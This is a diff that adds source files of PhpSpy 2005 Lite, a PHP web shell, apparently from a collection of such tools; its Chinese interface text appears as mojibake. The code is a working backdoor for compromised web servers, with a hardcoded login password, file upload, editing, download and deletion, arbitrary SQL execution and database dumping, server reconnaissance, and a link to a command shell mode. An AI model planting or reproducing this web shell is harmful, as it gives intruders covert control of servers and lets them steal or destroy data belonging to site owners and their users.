+		echo "  <td align=\"center\" class=\"firstalt\"><b>ÄúûÓÐÁ¬½ÓÊý¾Ý¿â or µ±Ç°Êý¾Ý¿âûÓÐÈκÎÊý¾Ý±í</b></td>\n";
+		echo "</tr>\n";
+	} else {
+	?>
+	<tr>
+	  <td align="center" class="secondalt"><table border="0" cellpadding="3" cellspacing="1"><tr>
+	  <td valign="top">ÇëÑ¡Ôñ±í:</td>
+	  <td><select name="table[]" multiple size="15">
+	<?php
+	if (is_array($cachetables)) {
+		foreach ($cachetables AS $key=>$value) {
+			echo "<option value=\"$key\">$value</option>\n";
+		}
+	}
+	?>
+	</select></td>
+	</tr>
+	<tr nowrap>
+	  <td>±¸·ÝÊý¾ÝËù±£´æµÄ·¾¶:</td>
+	  <td><input type="text" class="INPUT" name="path" size="50" maxlength="50" value="./<?=$_SERVER['HTTP_HOST']?>_MySQL.sql"></td>
+	</tr>
+	</table></td>
+	</tr>
+	<tr>
+	  <td align="center" class="firstalt"><input type="submit" name="dobackup" value="¿ªÊ¼±¸·Ý" class="INPUT"></td>
+	</tr>
+	<?php
+	}
+	echo "  </form>\n";
+	echo "</table>\n";
+	@mysql_close();
+}//end sql backup
+
+elseif ($_GET['action'] == "phpenv") {
+	$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊÐíÉÏ´«";
+
+	$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+
+	$dis_func = get_cfg_var("disable_functions");
+	if ($dis_func == "") {
+		$dis_func = "No";
+	}else {
+		$dis_func = str_replace(" ","<br>",$dis_func);
+		$dis_func = str_replace(",","<br>",$dis_func);
+	}
+	
+	$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+
+	$info[0]  = array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time()));
+	$info[1]  = array("·þÎñÆ÷ÓòÃû","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
+	$info[2]  = array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER['SERVER_NAME']));
+	$info[3]  = array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS);
+	$info[5]  = array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER['HTTP_ACCEPT_LANGUAGE']);
+	$info[6]  = array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER['SERVER_SOFTWARE']);
+	$info[7]  = array("Web·þÎñ¶Ë¿Ú",$_SERVER['SERVER_PORT']);
+	$info[8]  = array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name()));
+	$info[9]  = array("PHP°æ±¾",PHP_VERSION);
+	$info[10] = array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode"));
+	$info[11] = array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail);
+	$info[12] = array("±¾Îļþ·¾¶",__FILE__);
+	
+	$info[13] = array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen"));
+	$info[14] = array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl"));
+	$info[15] = array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors"));
+	$info[16] = array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals"));
+	$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
+	$info[18] = array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit"));
+	$info[19] = array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size"));
+	$info[20] = array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize);
+	$info[21] = array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë");
+	$info[22] = array("±»½ûÓõĺ¯Êý disable_functions",$dis_func);
+	$info[23] = array("phpinfo()",$phpinfo);
+	$info[24] = array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
+
+	$info[25] = array("ͼÐδ¦Àí GD Library",getfun("imageline"));
+	$info[26] = array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close"));
+	$info[27] = array("MySQLÊý¾Ý¿â",getfun("mysql_close"));
+	$info[28] = array("SyBaseÊý¾Ý¿â",getfun("sybase_close"));
+	$info[29] = array("OracleÊý¾Ý¿â",getfun("ora_close"));
+	$info[30] = array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff"));
+	$info[31] = array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match"));
+	$info[32] = array("PDFÎĵµÖ§³Ö",getfun("pdf_close"));
+	$info[33] = array("Postgre SQLÊý¾Ý¿â",getfun("pg_close"));
+	$info[34] = array("SNMPÍøÂç¹ÜÀíЭÒé",getfun("snmpget"));
+	$info[35] = array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose"));
+	$info[36] = array("XML½âÎö",getfun("xml_set_object"));
+	$info[37] = array("FTP",getfun("ftp_login"));
+	$info[38] = array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close"));
+	$info[39] = array("SessionÖ§³Ö",getfun("session_start"));
+	$info[40] = array("SocketÖ§³Ö",getfun("fsockopen"));
+?>
+<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+ <form action="?action=phpenv" method="POST">
+  <tr class="firstalt">
+    <td style="padding-left: 5px;"><b>²é¿´PHPÅäÖòÎÊý×´¿ö</b></td>
+  </tr>
+  <tr class="secondalt">
+    <td style="padding-left: 5px;">ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="²é¿´" class="input"></td>
+  </tr>
+ </form>
+<?php
+	for($a=0;$a<3;$a++){
+		if($a == 0){
+			$hp = array("server","·þÎñÆ÷ÌØÐÔ");
+		}elseif($a == 1){
+			$hp = array("php","PHP»ù±¾ÌØÐÔ");
+		}elseif($a == 2){
+			$hp = array("basic","×é¼þÖ§³Ö×´¿ö");
+		}
+?>
+  <tr class="firstalt">
+    <td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
+  </tr>
+  <tr class="secondalt">
+    <td>
+      <table width="100%" border="0" cellpadding="0" cellspacing="0">
+<?php
+		if($a == 0){
+			for($i=0;$i<=12;$i++){
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		}elseif($a == 1){
+			for($i=13;$i<=24;$i++){
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		}elseif($a == 2){
+			for($i=25;$i<=40;$i++){
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		}
+?>
+      </table>
+    </td>
+  </tr>
+<?php
+	}//for
+echo "</table>";
+}//end phpenv
+?>
+<hr width="760" noshade>
+<table width="760" border="0" cellpadding="0">
+  <tr>
+    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
+    <td align="right"><?php
+	debuginfo();
+	ob_end_flush();	
+	?></td>
+  </tr>
+</table>
+</center>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+	// µÇ½Èë¿Ú
+	function loginpage() {
+?>
+		<style type="text/css">
+		input {
+			font-family: "Verdana";
+			font-size: "11px";
+			BACKGROUND-COLOR: "#FFFFFF";
+			height: "18px";
+			border: "1px solid #666666";
+		}
+		</style>
+		<form method="POST" action="">
+		<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
+		<input type="submit" name="login" value="OK">
+		</form>
+<?php
+		exit;
+	}//end loginpage()
+
+	// Ò³Ãæµ÷ÊÔÐÅÏ¢
+	function debuginfo() {
+		global $starttime;
+		$mtime = explode(' ', microtime());
+		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+		echo "Processed in $totaltime second(s)";
+	}
+
+	// È¥µôתÒå×Ö·û
+	function stripslashes_array(&$array) {
+		while(list($key,$var) = each($array)) {
+			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
+				if (is_string($var)) {
+					$array[$key] = stripslashes($var);
+				}
+				if (is_array($var))  {
+					$array[$key] = stripslashes_array($var);
+				}
+			}
+		}
+		return $array;
+	}
+
+	// ɾ³ýĿ¼
+	function deltree($deldir) {
+		$mydir=@dir($deldir);	
+		while($file=$mydir->read())	{ 		
+			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
+				@chmod("$deldir/$file",0777);
+				deltree("$deldir/$file"); 
+			}
+			if (is_file("$deldir/$file")) {
+				@chmod("$deldir/$file",0777);
+				@unlink("$deldir/$file");
+			}
+		} 
+		$mydir->close(); 
+		@chmod("$deldir",0777);
+		echo @rmdir($deldir) ? "Ŀ¼ɾ³ý³É¹¦!" : "<font color=\"#ff0000\">Ŀ¼ɾ³ýʧ°Ü!</font>";	
+	} 
+
+	// Åж϶ÁдÇé¿ö
+	function dir_writeable($dir) {
+		if (!is_dir($dir)) {
+			@mkdir($dir, 0777);
+		}
+		if(is_dir($dir)) {
+			if ($fp = @fopen("$dir/test.txt", 'w')) {
+				@fclose($fp);
+				@unlink("$dir/test.txt");
+				$writeable = 1;
+			} else {
+				$writeable = 0;
+			}
+		}
+		return $writeable;
+	}
+
+	// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+	function getrowbg() {
+		global $bgcounter;
+		if ($bgcounter++%2==0) {
+			return "firstalt";
+		} else {
+			return "secondalt";
+		}
+	}
+
+	// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+	function getPath($mainpath, $relativepath) {
+		global $dir;
+		$mainpath_info           = explode('/', $mainpath);
+		$relativepath_info       = explode('/', $relativepath);
+		$relativepath_info_count = count($relativepath_info);
+		for ($i=0; $i<$relativepath_info_count; $i++) {
+			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
+			if ($relativepath_info[$i] == '..') {
+				$mainpath_info_count = count($mainpath_info);
+				unset($mainpath_info[$mainpath_info_count-1]);
+				continue;
+			}
+			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
+		} //end for
+		return implode('/', $mainpath_info);
+	}
+
+	// ¼ì²éPHPÅäÖòÎÊý
+	function getphpcfg($varname) {
+		switch($result = get_cfg_var($varname)) {
+			case 0:
+			return No;
+			break;
+			case 1:
+			return Yes;
+			break;
+			default:
+			return $result;
+			break;
+		}
+	}
+
+	// ¼ì²éº¯ÊýÇé¿ö
+	function getfun($funName) {
+		return (false !== function_exists($funName)) ? Yes : No;
+	}
+
+	// ѹËõ´ò°üÀà
+	class PHPZip{
+	var $out='';
+		function PHPZip($dir, $zipfilename="")	{
+    		if (@function_exists('gzcompress'))	{
+				$curdir = getcwd();
+				if (is_array($dir)) $filelist = $dir;
+		        else{
+			        $filelist=$this -> GetFileList($dir);//ÎļþÁбí
+				    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+	            }
+		        if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+				else chdir($curdir);
+				if (count($filelist)>0){
+					foreach($filelist as $filename){
+						if (is_file($filename)){
+							$fd = fopen ($filename, "r");
+							$content = @fread ($fd, filesize ($filename));
+							fclose ($fd);
+						    if (is_array($dir)) $filename = basename($filename);
+							$this -> addFile($content, $filename);
+						}
+					}
+					$this->out = $this -> file();
+					chdir($curdir);
+					// ÏÂÃ潫Éú³ÉµÄÄÚÈÝ$outдÈëÎļþ,Èç¹ûÐèÒªÔÚ·þÎñÆ÷Éú³ÉѹËõ°ü£¬ÇëÈ¥µô×¢ÊÍ
+					/*$fp = fopen($zipfilename, "w");
+		            fwrite($fp, $this->out, strlen($this->out));
+			        fclose($fp);
+				    */
+				}
+				return 1;
+			}
+			else return 0;
+		}
+
+		// »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí
+		function GetFileList($dir){
+			static $a;
+			if (is_dir($dir)) {
+				if ($dh = opendir($dir)) {
+			   		while (($file = readdir($dh)) !== false) {
+						if($file!='.' && $file!='..'){
+            				$f=$dir .'/'. $file;
+            				if(is_dir($f)) $this->GetFileList($f);
+							$a[]=$f;
+	        			}
+					}
+     				closedir($dh);
+    			}
+			}
+			return $a;
+		}
+
+		var $datasec      = array();
+	    var $ctrl_dir     = array();
+		var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	    var $old_offset   = 0;
+
+		function unix2DosTime($unixtime = 0) {
+	        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		    if ($timearray['year'] < 1980) {
+				$timearray['year']    = 1980;
+        		$timearray['mon']     = 1;
+	        	$timearray['mday']    = 1;
+		    	$timearray['hours']   = 0;
+				$timearray['minutes'] = 0;
+        		$timearray['seconds'] = 0;
+	        } // end if
+		    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+			        ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	    }
+
+		function addFile($data, $name, $time = 0) {
+	        $name     = str_replace('\\', '/', $name);
+
+		    $dtime    = dechex($this->unix2DosTime($time));
+	        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+		              . '\x' . $dtime[4] . $dtime[5]
+			          . '\x' . $dtime[2] . $dtime[3]
+				      . '\x' . $dtime[0] . $dtime[1];
+	        eval('$hexdtime = "' . $hexdtime . '";');
+		    $fr   = "\x50\x4b\x03\x04";
+			$fr   .= "\x14\x00";
+	        $fr   .= "\x00\x00";
+		    $fr   .= "\x08\x00";
+			$fr   .= $hexdtime;
+
+	        $unc_len = strlen($data);
+		    $crc     = crc32($data);
+			$zdata   = gzcompress($data);
+	        $c_len   = strlen($zdata);
+		    $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+			$fr      .= pack('V', $crc);
+	        $fr      .= pack('V', $c_len);
+		    $fr      .= pack('V', $unc_len);
+			$fr      .= pack('v', strlen($name));
+	        $fr      .= pack('v', 0);
+		    $fr      .= $name;
+
+			$fr .= $zdata;
+
+	        $fr .= pack('V', $crc);
+		    $fr .= pack('V', $c_len);
+			$fr .= pack('V', $unc_len);
+
+	        $this -> datasec[] = $fr;
+		    $new_offset        = strlen(implode('', $this->datasec));
+
+			$cdrec = "\x50\x4b\x01\x02";
+	        $cdrec .= "\x00\x00";
+		    $cdrec .= "\x14\x00";
+			$cdrec .= "\x00\x00";
+	        $cdrec .= "\x08\x00";
+		    $cdrec .= $hexdtime;
+			$cdrec .= pack('V', $crc);
+	        $cdrec .= pack('V', $c_len);
+		    $cdrec .= pack('V', $unc_len);
+			$cdrec .= pack('v', strlen($name) );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('v', 0 );
+			$cdrec .= pack('v', 0 );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('V', 32 );
+			$cdrec .= pack('V', $this -> old_offset );
+	        $this -> old_offset = $new_offset;
+		    $cdrec .= $name;
+
+			$this -> ctrl_dir[] = $cdrec;
+	    }
+
+		function file() {
+			$data    = implode('', $this -> datasec);
+	        $ctrldir = implode('', $this -> ctrl_dir);
+		    return
+			    $data .
+				$ctrldir .
+	            $this -> eof_ctrl_dir .
+		        pack('v', sizeof($this -> ctrl_dir)) .
+			    pack('v', sizeof($this -> ctrl_dir)) .
+				pack('V', strlen($ctrldir)) .
+	            pack('V', strlen($data)) .
+		        "\x00\x00";
+	    }
+	}
+
+	// ±¸·ÝÊý¾Ý¿â
+	function sqldumptable($table, $fp=0) {
+		$tabledump = "DROP TABLE IF EXISTS $table;\n";
+		$tabledump .= "CREATE TABLE $table (\n";
+
+		$firstfield=1;
+
+		$fields = mysql_query("SHOW FIELDS FROM $table");
+		while ($field = mysql_fetch_array($fields)) {
+			if (!$firstfield) {
+				$tabledump .= ",\n";
+			} else {
+				$firstfield=0;
+			}
+			$tabledump .= "   $field[Field] $field[Type]";
+			if (!empty($field["Default"])) {
+				$tabledump .= " DEFAULT '$field[Default]'";
+			}
+			if ($field['Null'] != "YES") {
+				$tabledump .= " NOT NULL";
+			}
+			if ($field['Extra'] != "") {
+				$tabledump .= " $field[Extra]";
+			}
+		}
+		mysql_free_result($fields);
+	
+		$keys = mysql_query("SHOW KEYS FROM $table");
+		while ($key = mysql_fetch_array($keys)) {
+			$kname=$key['Key_name'];
+			if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
+				$kname="UNIQUE|$kname";
+			}
+			if(!is_array($index[$kname])) {
+				$index[$kname] = array();
+			}
+			$index[$kname][] = $key['Column_name'];
+		}
+		mysql_free_result($keys);
+
+		while(list($kname, $columns) = @each($index)) {
+			$tabledump .= ",\n";
+			$colnames=implode($columns,",");
+
+			if ($kname == "PRIMARY") {
+				$tabledump .= "   PRIMARY KEY ($colnames)";
+			} else {
+				if (substr($kname,0,6) == "UNIQUE") {
+					$kname=substr($kname,7);
+				}
+				$tabledump .= "   KEY $kname ($colnames)";
+			}
+		}
+
+		$tabledump .= "\n);\n\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+
+		$rows = mysql_query("SELECT * FROM $table");
+		$numfields = mysql_num_fields($rows);
+		while ($row = mysql_fetch_array($rows)) {
+			$tabledump = "INSERT INTO $table VALUES(";
+
+			$fieldcounter=-1;
+			$firstfield=1;
+			while (++$fieldcounter<$numfields) {
+				if (!$firstfield) {
+					$tabledump.=", ";
+				} else {
+					$firstfield=0;
+				}
+
+				if (!isset($row[$fieldcounter])) {
+					$tabledump .= "NULL";
+				} else {
+					$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+				}
+			}
+
+			$tabledump .= ");\n";
+
+			if ($fp) {
+				fwrite($fp,$tabledump);
+			} else {
+				echo $tabledump;
+			}
+		}
+		mysql_free_result($rows);
+	}
+?>
\ No newline at end of file
diff --git a/php/phpspy/phpspy_2005_lite.php b/php/phpspy/phpspy_2005_lite.php
new file mode 100644
index 0000000..4084c6a
--- /dev/null
+++ b/php/phpspy/phpspy_2005_lite.php
@@ -0,0 +1,659 @@
+<?php
+/*
++--------------------------------------------------------------------------+
+| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Lite                    |
+| Codz by Angel                                                            |
+| (c) 2004 Security Angel Team                                             |
+| http://www.4ngel.net                                                     |
+| ======================================================================== |
+| Team:  http://www.4ngel.net                                              |
+|        http://www.bugkidz.org                                            |
+| Email: 4ngel@21cn.com                                                    |
+| Date:  Dec 28st(My girl friend's birthday), 2004                         |
++--------------------------------------------------------------------------+
+*/
+
+/*
+Ìáʾ£ºÈç¹ûÏëÔÙ¾«¼òһЩ£¬Çë×ÔÐаÑËùÓÐ×¢ÊÍÈ¥µô¡£
+*/
+
+error_reporting(7);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤,1ΪÐèÒªÑéÖ¤,ÆäËûÊý×ÖΪֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check']="1";
+
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']="angel";
+
+/*===================== ÅäÖýáÊø =====================*/
+
+
+// ÔÊÐí³ÌÐòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷
+if ( function_exists('ini_get') ) {
+	$onoff = ini_get('register_globals');
+} else {
+	$onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+	@extract($_POST, EXTR_SKIP);
+	@extract($_GET, EXTR_SKIP);
+}
+
+$self = $_SERVER['PHP_SELF'];
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if($admin['check']=="1") {
+	if ($_GET['action'] == "logout") {
+		setcookie ("adminpass", "");
+		echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+		echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+		exit;
+	}
+	if ($login) {
+		$adminpass=trim($_POST['adminpass']);
+		if ($adminpass==$admin['pass']) {
+			setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
+			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+			echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+			exit;
+		}
+	}
+	if (isset($_COOKIE['adminpass'])) {
+		if ($_COOKIE['adminpass']!=$admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}//end check
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+// ÅÐ¶Ï magic_quotes_gpc ״̬
+if (get_magic_quotes_gpc()) {
+    $_GET = stripslashes_array($_GET);
+	$_POST = stripslashes_array($_POST);
+}
+
+if ($_GET['action'] == "phpinfo") {
+	$dis_func = get_cfg_var("disable_functions");
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´&lt;PHP»·¾³±äÁ¿&gt;";
+	exit;
+}
+
+// ÏÂÔØÎļþ
+if (!empty($downfile)) {
+	if (!@file_exists($downfile)) {
+		echo "<script>alert('ÄãҪϵÄÎļþ²»´æÔÚ!')</script>";
+	} else {
+		$filename = basename($downfile);
+		$filename_info = explode('.', $filename);
+		$fileext = $filename_info[count($filename_info)-1];
+		header('Content-type: application/x-'.$fileext);
+		header('Content-Disposition: attachment; filename='.$filename);
+		header('Content-Description: PHP Generated Data');
+		header('Content-Length: '.filesize($downfile));
+		@readfile($downfile);
+		exit;
+	}
+}
+
+// ³ÌÐòĿ¼
+$pathname=str_replace('\\','/',dirname(__FILE__)); 
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!isset($dir) or empty($dir)) {
+	$dir = ".";
+	$nowpath = getPath($pathname, $dir);
+} else {
+	$dir=$_GET['dir'];
+	$nowpath = getPath($pathname, $dir);
+}
+
+// Åж϶ÁдÇé¿ö
+if (dir_writeable($nowpath)) {
+	$dir_writeable = "¿Éд";
+} else {
+	$dir_writeable = "²»¿Éд";
+}
+
+$dis_func = get_cfg_var("disable_functions");
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
+$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>PhpSpy Ver 2005</title>
+<style type="text/css">
+body,td {
+	font-family: "sans-serif";
+	font-size: "12px";
+	line-height: "150%";
+}
+.smlfont {
+	font-family: "sans-serif";
+	font-size: "11px";
+}
+.INPUT {
+	FONT-SIZE: "12px";
+	COLOR: "#000000";
+	BACKGROUND-COLOR: "#FFFFFF";
+	height: "18px";
+	border: "1px solid #666666";
+}
+.redfont {
+	COLOR: "#A60000";
+}
+a:link,
+a:visited,
+a:active{
+	color: "#000000";
+	text-decoration: underline;
+}
+a:hover{
+	color: "#465584";
+	text-decoration: none;
+}
+.firstalt	{BACKGROUND-COLOR: "#EFEFEF"}
+.secondalt	{BACKGROUND-COLOR: "#F5F5F5"}
+</style>
+</head>
+
+<body style="table-layout:fixed; word-break:break-all">
+<center>
+<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
+  <tr bgcolor="#cccccc">
+    <td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
+    <td width="10" align="center" nowrap><b>:</b></td>
+    <td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
+  </tr>
+  <tr>
+    <td colspan="3" align="center" nowrap><a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»Ø PhpSpy Ŀ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="http://www.4ngel.net" target="_blank" title="ÏÂÔش˳ÌÐò">Version 2005</a></td>
+  </tr>
+</table>
+<hr width="760" noshade>
+<table width="760" border="0" cellpadding="0">
+ <form action="" method="GET">
+  <tr>
+    <td><p>³ÌÐò·¾¶:<?=$pathname?><br>µ±Ç°Ä¿Â¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
+        <br>ÌøתĿ¼:
+        <input name="dir" type="text" class="INPUT">
+        <input type="submit" class="INPUT" value="È·¶¨"> ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½
+    </p></td>
+  </tr>
+ </form>
+ <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
+  <tr>
+    <td colspan="2">ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼:
+      <input name="uploadmyfile" type="file" class="INPUT">	<input type="submit" name="uploadfile" class="INPUT" value="È·¶¨"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
+  </tr>
+  </form>
+  <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
+  <tr>
+    <td colspan="2">н¨ÎļþÔÚµ±Ç°Ä¿Â¼:
+        <input name="newfile" type="text" class="INPUT" value="">
+        <input type="submit" name="createfile" class="INPUT" value="È·¶¨"></td>
+  </tr>
+  </form>
+</table>
+<hr width="760" noshade>
+<?php
+/*===================== Ö´ÐвÙ×÷ ¿ªÊ¼ =====================*/
+echo "<p><b>\n";
+// ɾ³ýÎļþ
+if(@$delfile!="") {
+	if(file_exists($delfile)) {
+		if (@unlink($delfile)) {
+			echo "".$delfile." ɾ³ý³É¹¦!";
+		} else {
+			echo "Îļþɾ³ýʧ°Ü!";
+		}
+	} else {
+		echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!";
+	}
+}
+
+// ɾ³ýĿ¼
+elseif($rmdir) {
+	if($deldir!="") {
+		$deldirs="$dir/$deldir";
+		if(!file_exists("$deldirs")) {
+			echo "Ŀ¼ÒѲ»´æÔÚ!";
+		} else {
+			deltree($deldirs);
+		}
+	} else {
+		echo "ɾ³ýʧ°Ü!";
+	}
+}
+
+// ÉÏ´«Îļþ
+elseif($uploadfile) {
+	echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
+}
+
+// ±à¼­Îļþ
+elseif($doeditfile) {
+	$filename="$editfilename";
+	@$fp=fopen("$filename","w");
+	echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!";
+	@fclose($fp);
+}
+
+// Á¬½ÓMYSQL
+elseif($connect) {
+	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
+		echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!";
+		mysql_close();
+	} else {
+		echo mysql_error();
+	}
+}
+
+// Ö´ÐÐSQLÓï¾ä
+elseif($doquery) {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");
+	$result = @mysql_query($_POST['sql_query']);
+	echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ÐÐ" : "³ö´í: ".mysql_error();
+	mysql_close();
+}
+
+// ²é¿´PHPÅäÖòÎÊý×´¿ö
+elseif($viewphpvar) {
+	echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
+}
+
+else {
+	echo "±¾³ÌÐòÓÉ <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> С×é angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> ÏÂÔØ×îа汾.";
+}
+
+echo "</b></p>\n";
+/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/
+
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr bgcolor="#cccccc">
+    <td align="center" nowrap width="30%"><b>Îļþ</b></td>
+	<td align="center" nowrap width="17%"><b>´´½¨ÈÕÆÚ</b></td>
+    <td align="center" nowrap width="17%"><b>×îºóÐÞ¸Ä</b></td>
